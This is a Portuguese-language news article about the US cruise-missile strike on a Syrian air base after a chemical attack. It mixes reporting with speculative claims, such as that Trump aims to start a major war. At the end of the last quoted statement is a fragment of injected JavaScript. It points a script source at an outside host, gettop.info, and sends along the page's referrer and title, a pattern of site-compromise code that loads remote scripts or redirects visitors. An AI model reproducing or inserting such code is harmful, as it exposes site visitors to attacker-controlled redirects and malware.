Trump ataca a Síria e coloca o mundo em alerta de guerra

Ataque à Síria foi promessa de camapanha de Trump à presidência dos EUA. Foto: Reprodução

Os Estados Unidos lançaram na madrugada desta sexta-feira (7) um ataque com mísseis à Síria, visando alvos militares do regime de Bashar al-Assad. Segundo o Exército sírio seis vítimas já foram confirmadas, mas o número pode passar nove pessoas mortas, entre as quais quatro crianças.

A ofensiva norte-americana coloca o mundo em alerta. Com o apoio de potências militares como a Alemanha, Trump pode conseguir o objetivo de iniciar uma nova grande guerra. Por outro lado, a decisão de enviar mísseis à Síria não agradou a Rússia – do aliado Vladimir Putin.

Segundo o Pentágono, foram lançados pelo menos 59 mísseis de cruzeiro Tomahawk de navios de guerra no Mediterrâneo visando a base aérea al-Shayrat. É esta a região de onde partiu o ataque do início da semana com armas químicas. Nesse ataque, mais de 70 pessoas morreram, muitas delas crianças.

Donald Trump afirmou ter “ordenado uma ação militar à base aérea da Síria de onde foi lançado o ataque químico”.

“É do interesse vital para a segurança nacional dos Estados Unidos impedir e parar a proliferação do uso de armas químicas”, justifica o presidente norte-americano, para quem “anos de tentativas para mudar o comportamento de Assad falharam, de forma dramática”.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário